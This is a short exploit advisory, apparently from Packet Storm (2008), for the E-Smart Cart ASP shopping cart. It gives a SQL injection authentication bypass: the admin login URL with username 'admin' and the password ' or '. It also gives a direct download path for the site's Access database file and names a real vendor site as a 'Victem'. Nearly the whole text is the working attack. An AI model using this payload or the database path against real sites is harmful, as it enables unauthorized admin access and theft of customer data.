E-Smart Cart SQL Injection / Disclosure

2008-12-17T00:00:00
ID PACKETSTORM:73103
Type packetstorm
Reporter Pouya Server
Modified 2008-12-17T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name: E-SMART CART  
Vendor : http://preproject.com/smartcart.asp  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : (SQL,DD)  
---------------------------------------------------------  
#########################################################  
[Auth Bypass]:  
http://www.site.com/[Path]/embadmin/admin_main.asp  
user: admin  
pass: ' or '  
  
[DD]:  
http://www.site.com/[Path]/database/pre_shoppingmall.mdb  
  
---------------------------------  
Victem :  
http://www.preproject.com/GScart  
  
  
  
`